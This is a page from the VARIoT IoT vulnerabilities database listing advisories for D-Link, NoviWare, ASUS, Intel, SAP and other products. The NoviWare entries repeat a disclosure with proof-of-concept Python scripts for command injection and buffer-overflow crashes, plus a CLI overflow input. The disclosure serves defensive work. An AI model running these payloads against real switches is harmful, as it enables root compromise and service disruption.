VARIoT IoT vulnerabilities database

Session fixation vulnerability in D-Link DIR-600L routers (rev. Ax) with firmware before FW1.17.B01 allows remote attackers to hijack web sessions via unspecified vectors. D-Link DIR-600L The router firmware contains a session fixation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-600L is a cloud router product from D-Link

The RealTime RWR-3G-100 Router Firmware Version : Ver1.0.56 is affected by CSRF an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. RealTime RWR-3G-100 Router firmware contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. RealTimeRWR-3G-100Router is a router from RealTimeSystem of India. A cross-site request forgery vulnerability exists in RealTimeRWR-3G-100Router using firmware version 1.0.56. This vulnerability can be exploited by remote attackers to force end users to perform unintended operations

FS726T is a classic intelligent switch under Netgear. There is an XSS vulnerability in the background of NETGEAR FS726Tv2. An attacker can use this vulnerability to pop up a message in the login box to modify it.

Remote enabling and disabling admin interface in Gemalto's HASP SRM, Sentinel HASP and Sentinel LDK products prior to Sentinel LDK RTE version 7.55 leads to new attack vectors. Gemalto Sentinel License Manager is prone to the following security vulnerabilities: 1. Multiple stack-based buffer-overflow vulnerabilities. 2. Multiple heap-based buffer-overflow vulnerabilities. 3. A security bypass vulnerability. 4. A denial-of-service vulnerability. Attackers can exploit these issues to execute arbitrary code in the context of the user running the affected application or perform unauthorized actions. Failed exploit attempts will likely cause a denial-of-service condition. Sentinel LDK is a license management tool. A remote attacker could exploit this vulnerability to execute code

Arbitrary memory read from controlled memory pointer in Gemalto's HASP SRM, Sentinel HASP and Sentinel LDK products prior to Sentinel LDK RTE version 7.55 leads to remote denial of service. Gemalto Sentinel License Manager is prone to the following security vulnerabilities: 1. Multiple stack-based buffer-overflow vulnerabilities. 2. Multiple heap-based buffer-overflow vulnerabilities. 3. A security bypass vulnerability. 4. A denial-of-service vulnerability. Attackers can exploit these issues to execute arbitrary code in the context of the user running the affected application or perform unauthorized actions. Failed exploit attempts will likely cause a denial-of-service condition. Sentinel LDK is a license management tool

Memory corruption in Gemalto's HASP SRM, Sentinel HASP and Sentinel LDK products prior to Sentinel LDK RTE version 7.55 might cause remote code execution. Gemalto Sentinel License Manager is prone to the following security vulnerabilities: 1. Multiple stack-based buffer-overflow vulnerabilities. 2. Multiple heap-based buffer-overflow vulnerabilities. 3. A security bypass vulnerability. 4. A denial-of-service vulnerability. Attackers can exploit these issues to execute arbitrary code in the context of the user running the affected application or perform unauthorized actions. Failed exploit attempts will likely cause a denial-of-service condition. Sentinel LDK is a license management tool

Network interfaces of the cliengine and noviengine services, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because there is a stack-based buffer overflow during unserialization of packet data. NoviWare Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NoviFlowNoviWare and NoviSwitchdevices are products of NoviFlow Canada. NoviSwitchdevices is a series of switch devices. NoviWare is the switch software used in it. A stack buffer overflow vulnerability exists in the NoviFlowNoviWareNW400.2.6 and earlier versions and the Network interface for the cliengine and noviengine services in the NoviSwitch device. A remote attacker could exploit the vulnerability to execute code with root privileges. NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities Introduction ========== NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant switch software developed by NoviFlow and available for license to network equipment manufacturers. Multiple vulnerabilities were identified in the NoviWare software deployed on NoviSwitch devices. CVEs ===== * CVE-2017-12784: remote code execution in novi_process_manager_daemon Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) * CVE-2017-12785: cli breakout in novish Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C) * CVE-2017-12786: remote code execution in noviengine and cliengine Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) Affected versions ============== NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version is deployed Author ====== FranASSois Goichon - Google Security Team CVE-2017-12784 ============== Remote code execution in novi_process_manager_daemon Summary ------------- The NoviWare switching software distribution is prone to two distinct bugs which could potentially allow a remote, unauthenticated attacker to gain privileged (root) code execution on the switch device. - A flaw when applying ACL changes requested from the CLI could expose the novi_process_manager_daemon network service - This network service is prone to command injection and a stack-based buffer overflow Reproduction ------------------ If TCP port 2020 is accepting connections from the network, the following python script can be used to ping yourself on vulnerable versions : --- from struct import pack import socket s = socket.socket() s.connect((<switch host>, 2020)) payload = pack("<I", 0xffffffff).ljust(0x24) + "ping <your ip>; echo\x00" s.sendall(pack("<II", 1, len(payload)+8)) s.sendall(payload) s.close() --- On vulnerable versions, the appliance will perform an ICMP request to the specified IP, which can be observed in network logs. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. CVE-2017-12785 ============== Cli breakout in novish Summary ------------- The NoviWare switching software distribution is prone to a buffer overflow and a command injection, allowing authenticated, low-privileged users to break out of the CLI and execute commands as root. Reproduction ------------------ Log in to the appliance via SSH and run the following command from the CLI: -- noviswitch# show log cli username AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -- If the appliance is vulnerable, the cli crashes and the session ends. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. - A flaw when applying ACL changes requested from the CLI could expose noviengine and cliengine network services - These network services are prone to a stack-based buffer overflow when unpacking serialized values. Reproduction ------------------ If TCP ports 9090 or 12345 are accepting connections from the network, the following python script can be used to cause a crash on vulnerable versions : --- from struct import pack import socket s = socket.socket() s.connect((<switch host>, <9090 or 12345>)) payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)]) payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload s.sendall(payload) s.read(1) s.close() --- A watchdog should restart the service if it has crashed. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. Disclosure timeline =============== 2017/05/11 - Report sent to NoviFlow 2017/05/26 - Bugs acknowledged and remediation timeline confirmed 2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities 2017/08/09 - CVE requests 2017/08/16 - Public disclosure

A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow. NoviWare Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NoviFlowNoviWare and NoviSwitchdevices are products of NoviFlow Canada. NoviSwitchdevices is a series of switch devices. NoviWare is the switch software used in it. NoviFlowNoviWareNW400.2.6 and previous versions and noviSwitch devices have a security vulnerability in the network interface of novi_process_manager_daemon. A remote attacker could exploit the vulnerability to execute code with root privileges. NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities Introduction ========== NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant switch software developed by NoviFlow and available for license to network equipment manufacturers. Multiple vulnerabilities were identified in the NoviWare software deployed on NoviSwitch devices. CVEs ===== * CVE-2017-12784: remote code execution in novi_process_manager_daemon Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) * CVE-2017-12785: cli breakout in novish Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C) * CVE-2017-12786: remote code execution in noviengine and cliengine Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) Affected versions ============== NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version is deployed Author ====== FranASSois Goichon - Google Security Team CVE-2017-12784 ============== Remote code execution in novi_process_manager_daemon Summary ------------- The NoviWare switching software distribution is prone to two distinct bugs which could potentially allow a remote, unauthenticated attacker to gain privileged (root) code execution on the switch device. - A flaw when applying ACL changes requested from the CLI could expose the novi_process_manager_daemon network service - This network service is prone to command injection and a stack-based buffer overflow Reproduction ------------------ If TCP port 2020 is accepting connections from the network, the following python script can be used to ping yourself on vulnerable versions : --- from struct import pack import socket s = socket.socket() s.connect((<switch host>, 2020)) payload = pack("<I", 0xffffffff).ljust(0x24) + "ping <your ip>; echo\x00" s.sendall(pack("<II", 1, len(payload)+8)) s.sendall(payload) s.close() --- On vulnerable versions, the appliance will perform an ICMP request to the specified IP, which can be observed in network logs. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. CVE-2017-12785 ============== Cli breakout in novish Summary ------------- The NoviWare switching software distribution is prone to a buffer overflow and a command injection, allowing authenticated, low-privileged users to break out of the CLI and execute commands as root. Reproduction ------------------ Log in to the appliance via SSH and run the following command from the CLI: -- noviswitch# show log cli username AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -- If the appliance is vulnerable, the cli crashes and the session ends. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. - A flaw when applying ACL changes requested from the CLI could expose noviengine and cliengine network services - These network services are prone to a stack-based buffer overflow when unpacking serialized values. Reproduction ------------------ If TCP ports 9090 or 12345 are accepting connections from the network, the following python script can be used to cause a crash on vulnerable versions : --- from struct import pack import socket s = socket.socket() s.connect((<switch host>, <9090 or 12345>)) payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)]) payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload s.sendall(payload) s.read(1) s.close() --- A watchdog should restart the service if it has crashed. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. Disclosure timeline =============== 2017/05/11 - Report sent to NoviFlow 2017/05/26 - Bugs acknowledged and remediation timeline confirmed 2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities 2017/08/09 - CVE requests 2017/08/16 - Public disclosure

The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the "show log cli" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection. NoviWare Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities Introduction ========== NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant switch software developed by NoviFlow and available for license to network equipment manufacturers. Multiple vulnerabilities were identified in the NoviWare software deployed on NoviSwitch devices. CVEs ===== * CVE-2017-12784: remote code execution in novi_process_manager_daemon Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) * CVE-2017-12785: cli breakout in novish Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C) * CVE-2017-12786: remote code execution in noviengine and cliengine Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) Affected versions ============== NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version is deployed Author ====== FranASSois Goichon - Google Security Team CVE-2017-12784 ============== Remote code execution in novi_process_manager_daemon Summary ------------- The NoviWare switching software distribution is prone to two distinct bugs which could potentially allow a remote, unauthenticated attacker to gain privileged (root) code execution on the switch device. - A flaw when applying ACL changes requested from the CLI could expose the novi_process_manager_daemon network service - This network service is prone to command injection and a stack-based buffer overflow Reproduction ------------------ If TCP port 2020 is accepting connections from the network, the following python script can be used to ping yourself on vulnerable versions : --- from struct import pack import socket s = socket.socket() s.connect((<switch host>, 2020)) payload = pack("<I", 0xffffffff).ljust(0x24) + "ping <your ip>; echo\x00" s.sendall(pack("<II", 1, len(payload)+8)) s.sendall(payload) s.close() --- On vulnerable versions, the appliance will perform an ICMP request to the specified IP, which can be observed in network logs. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. Reproduction ------------------ Log in to the appliance via SSH and run the following command from the CLI: -- noviswitch# show log cli username AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -- If the appliance is vulnerable, the cli crashes and the session ends. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. - A flaw when applying ACL changes requested from the CLI could expose noviengine and cliengine network services - These network services are prone to a stack-based buffer overflow when unpacking serialized values. Reproduction ------------------ If TCP ports 9090 or 12345 are accepting connections from the network, the following python script can be used to cause a crash on vulnerable versions : --- from struct import pack import socket s = socket.socket() s.connect((<switch host>, <9090 or 12345>)) payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)]) payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload s.sendall(payload) s.read(1) s.close() --- A watchdog should restart the service if it has crashed. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. Disclosure timeline =============== 2017/05/11 - Report sent to NoviFlow 2017/05/26 - Bugs acknowledged and remediation timeline confirmed 2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities 2017/08/09 - CVE requests 2017/08/16 - Public disclosure

Cross-site scripting (XSS) vulnerability in Video Metadata Editor in Synology Video Station before 2.3.0-1435 allows remote authenticated attackers to inject arbitrary web script or HTML via the title parameter. Synology Video Station Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Synology Video Station is a video manager from Synology. Video Metadata Editor is one of the video metadata editors

The DIR series is a series of cloud router products from D-Link. The D-LinkDIR series routers have a remote information bypass vulnerability that triggers global variables when an administrator logs in to the device. Therefore, an attacker can use this global variable to bypass security checks and use it to read arbitrary files and obtain sensitive information such as administrator account passwords.

The DIR series is a series of cloud router products from D-Link. A remote command execution vulnerability exists in the D-LinkDIR series router. The attacker can obtain the router background login credentials and execute arbitrary code through the router public network portal.

A privilege escalation vulnerability was identified in Lenovo Active Protection System for ThinkPad systems versions earlier than 1.82.0.17. An attacker with local privileges could execute code with administrative privileges via an unquoted service path. plural Lenovo ThinkPad The product contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Lenovo Active Protection System is prone to a local privilege-escalation vulnerability. Lenovo Thinkpad for Windows is a Windows-based portable computer owned by China Lenovo (Lenovo). Active Protection System is an autonomous feature designed to protect hard drives from damage caused by strong physical shocks and vibrations

Data corruption vulnerability in firmware in Intel Solid-State Drive Professional PSF104P, PSF109P allows local users to cause a denial of service via unspecified vectors. IntelSolid-StateDriveProfessional is a solid state drive from Intel Corporation of the United States. There is a security vulnerability in the firmware in the IntelSolid-StateDriveProfessionalPSF104P and PSF109P versions

Data corruption vulnerability in firmware in Intel Solid-State Drive Consumer, Professional, Embedded, Data Center affected firmware versions LSBG200, LSF031C, LSF036C, LBF010C, LSBG100, LSF031C, LSF036C, LBF010C, LSF031P, LSF036P, LBF010P, LSF031P, LSF036P, LBF010P, LSMG200, LSF031E, LSF036E, LSMG100, LSF031E, LSF036E, LSDG200, LSF031D, LSF036D allows local users to cause a denial of service via unspecified vectors. plural Intel The firmware contains an input validation vulnerability.Denial of service (DoS) May be in a state. Intel SSD540sSeries and so on are all different series of SSD products from Intel Corporation of the United States. There are security vulnerabilities in several Intel products

Stack buffer overflow in httpd in Asuswrt-Merlin firmware 380.67_0RT-AC5300 and earlier for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code on the router by sending a crafted http GET request packet that includes a long delete_offline_client parameter in the url. plural ASUS For devices Asuswrt-Merlin Firmware and ASUS The firmware contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUSRT-AC5300 and others are wireless routers from ASUS. ASUSAsuswrt-Merlin is the firmware running in it. Httpd is one of the embedded http servers. A stack buffer overflow vulnerability exists in Asuswrt-Merlin380.67_0RT-AC5300 and previous versions of httpd in several ASUS products

An Uncontrolled Search Path Element issue was discovered in Moxa SoftNVR-IA Live Viewer, Version 3.30.3122 and prior versions. An uncontrolled search path element (DLL Hijacking) vulnerability has been identified. To exploit this vulnerability, an attacker could rename a malicious DLL to meet the criteria of the application, and the application would not verify that the DLL is correct. The attacker needs to have administrative access to the default install location in order to plant the insecure DLL. Once loaded by the application, the DLL could run malicious code at the privilege level of the application. Moxa SoftNVR-IA Live Viewer is a video surveillance software developed by Moxa for industrial automation systems. A DLL native arbitrary code execution vulnerability exists in Moxa SoftNVR-IA Live Viewer 3.30.3122 and earlier. This vulnerability stems from a program failing to properly filter user-submitted input

SAP NetWeaver is prone to an unspecified SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

SAP NetWeaver is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

SAP NetWeaver is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.